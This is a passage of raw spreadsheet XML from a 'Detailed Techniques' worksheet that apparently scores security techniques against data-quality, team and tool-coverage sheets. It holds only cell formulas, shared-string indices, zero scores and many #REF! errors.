        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F89&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F89))-LEN(SUBSTITUTE(TRIM(F89),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I89" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F89&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F89))-LEN(SUBSTITUTE(TRIM(F89),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J89" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F89&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F89))-LEN(SUBSTITUTE(TRIM(F89),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K89" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L89" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F89&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F89))-LEN(SUBSTITUTE(TRIM(F89),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M89" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N89" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F89&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F89))-LEN(SUBSTITUTE(TRIM(F89),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O89" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P89" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F89&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F89))-LEN(SUBSTITUTE(TRIM(F89),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q89" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R89" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F89&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F89))-LEN(SUBSTITUTE(TRIM(F89),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S89" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T89" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F89&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F89))-LEN(SUBSTITUTE(TRIM(F89),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U89" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V89" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F89&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F89))-LEN(SUBSTITUTE(TRIM(F89),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W89" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X89" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F89&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F89))-LEN(SUBSTITUTE(TRIM(F89),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y89" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="90" spans="1:25" ht="71.25" x14ac:dyDescent="0.45">
      <c r="A90" s="8" t="s">
        <v>90</v>
      </c>
      <c r="B90" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C90" s="8" t="s">
        <v>637</v>
      </c>
      <c r="D90" s="10" t="s">
        <v>638</v>
      </c>
      <c r="E90" s="10" t="s">
        <v>639</v>
      </c>
      <c r="F90" s="10" t="s">
        <v>640</v>
      </c>
      <c r="G90" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K90,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H90" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F90&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F90))-LEN(SUBSTITUTE(TRIM(F90),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I90" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F90&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F90))-LEN(SUBSTITUTE(TRIM(F90),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J90" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F90&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F90))-LEN(SUBSTITUTE(TRIM(F90),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K90" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L90" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F90&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F90))-LEN(SUBSTITUTE(TRIM(F90),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M90" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N90" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F90&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F90))-LEN(SUBSTITUTE(TRIM(F90),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O90" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P90" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F90&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F90))-LEN(SUBSTITUTE(TRIM(F90),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q90" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R90" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F90&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F90))-LEN(SUBSTITUTE(TRIM(F90),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S90" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T90" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F90&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F90))-LEN(SUBSTITUTE(TRIM(F90),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U90" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V90" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F90&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F90))-LEN(SUBSTITUTE(TRIM(F90),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W90" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X90" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F90&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F90))-LEN(SUBSTITUTE(TRIM(F90),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y90" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="91" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A91" s="8" t="s">
        <v>38</v>
      </c>
      <c r="B91" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C91" s="8" t="s">
        <v>641</v>
      </c>
      <c r="D91" s="10" t="s">
        <v>642</v>
      </c>
      <c r="E91" s="10" t="s">
        <v>424</v>
      </c>
      <c r="F91" s="10" t="s">
        <v>643</v>
      </c>
      <c r="G91" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K91,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H91" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F91&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F91))-LEN(SUBSTITUTE(TRIM(F91),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I91" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F91&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F91))-LEN(SUBSTITUTE(TRIM(F91),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J91" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F91&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F91))-LEN(SUBSTITUTE(TRIM(F91),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K91" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L91" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F91&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F91))-LEN(SUBSTITUTE(TRIM(F91),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M91" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N91" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F91&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F91))-LEN(SUBSTITUTE(TRIM(F91),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O91" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P91" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F91&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F91))-LEN(SUBSTITUTE(TRIM(F91),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q91" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R91" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F91&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F91))-LEN(SUBSTITUTE(TRIM(F91),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S91" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T91" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F91&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F91))-LEN(SUBSTITUTE(TRIM(F91),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U91" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V91" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F91&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F91))-LEN(SUBSTITUTE(TRIM(F91),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W91" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X91" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F91&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F91))-LEN(SUBSTITUTE(TRIM(F91),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y91" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="92" spans="1:25" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A92" s="8" t="s">
        <v>101</v>
      </c>
      <c r="B92" s="8" t="s">
        <v>5</v>
      </c>
      <c r="C92" s="8" t="s">
        <v>644</v>
      </c>
      <c r="D92" s="10" t="s">
        <v>645</v>
      </c>
      <c r="E92" s="10" t="s">
        <v>646</v>
      </c>
      <c r="F92" s="10" t="s">
        <v>647</v>
      </c>
      <c r="G92" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K92,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H92" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F92&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F92))-LEN(SUBSTITUTE(TRIM(F92),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I92" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F92&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F92))-LEN(SUBSTITUTE(TRIM(F92),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J92" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F92&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F92))-LEN(SUBSTITUTE(TRIM(F92),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K92" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L92" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F92&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F92))-LEN(SUBSTITUTE(TRIM(F92),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M92" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N92" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F92&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F92))-LEN(SUBSTITUTE(TRIM(F92),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O92" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P92" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F92&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F92))-LEN(SUBSTITUTE(TRIM(F92),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q92" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R92" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F92&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F92))-LEN(SUBSTITUTE(TRIM(F92),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S92" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T92" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F92&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F92))-LEN(SUBSTITUTE(TRIM(F92),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U92" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V92" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F92&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F92))-LEN(SUBSTITUTE(TRIM(F92),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W92" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X92" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F92&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F92))-LEN(SUBSTITUTE(TRIM(F92),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y92" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="93" spans="1:25" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A93" s="8" t="s">
        <v>28</v>
      </c>
      <c r="B93" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C93" s="8" t="s">
        <v>648</v>
      </c>
      <c r="D93" s="10" t="s">
        <v>649</v>
      </c>
      <c r="E93" s="10" t="s">
        <v>650</v>
      </c>
      <c r="F93" s="10" t="s">
        <v>651</v>
      </c>
      <c r="G93" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K93,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H93" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F93&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F93))-LEN(SUBSTITUTE(TRIM(F93),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I93" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F93&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F93))-LEN(SUBSTITUTE(TRIM(F93),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J93" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F93&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F93))-LEN(SUBSTITUTE(TRIM(F93),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K93" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L93" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F93&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F93))-LEN(SUBSTITUTE(TRIM(F93),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M93" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N93" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F93&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F93))-LEN(SUBSTITUTE(TRIM(F93),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O93" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P93" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F93&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F93))-LEN(SUBSTITUTE(TRIM(F93),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q93" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R93" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F93&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F93))-LEN(SUBSTITUTE(TRIM(F93),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S93" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T93" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F93&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F93))-LEN(SUBSTITUTE(TRIM(F93),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U93" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V93" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F93&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F93))-LEN(SUBSTITUTE(TRIM(F93),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W93" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X93" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F93&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F93))-LEN(SUBSTITUTE(TRIM(F93),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y93" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="94" spans="1:25" ht="142.5" x14ac:dyDescent="0.45">
      <c r="A94" s="8" t="s">
        <v>102</v>
      </c>
      <c r="B94" s="8" t="s">
        <v>541</v>
      </c>
      <c r="C94" s="8" t="s">
        <v>652</v>
      </c>
      <c r="D94" s="10" t="s">
        <v>653</v>
      </c>
      <c r="E94" s="10" t="s">
        <v>654</v>
      </c>
      <c r="F94" s="10" t="s">
        <v>655</v>
      </c>
      <c r="G94" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K94,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H94" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F94&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F94))-LEN(SUBSTITUTE(TRIM(F94),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I94" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F94&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F94))-LEN(SUBSTITUTE(TRIM(F94),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J94" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F94&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F94))-LEN(SUBSTITUTE(TRIM(F94),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K94" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L94" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F94&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F94))-LEN(SUBSTITUTE(TRIM(F94),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M94" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N94" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F94&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F94))-LEN(SUBSTITUTE(TRIM(F94),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O94" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P94" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F94&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F94))-LEN(SUBSTITUTE(TRIM(F94),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q94" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R94" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F94&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F94))-LEN(SUBSTITUTE(TRIM(F94),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S94" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T94" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F94&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F94))-LEN(SUBSTITUTE(TRIM(F94),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U94" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V94" s="20" t="e">
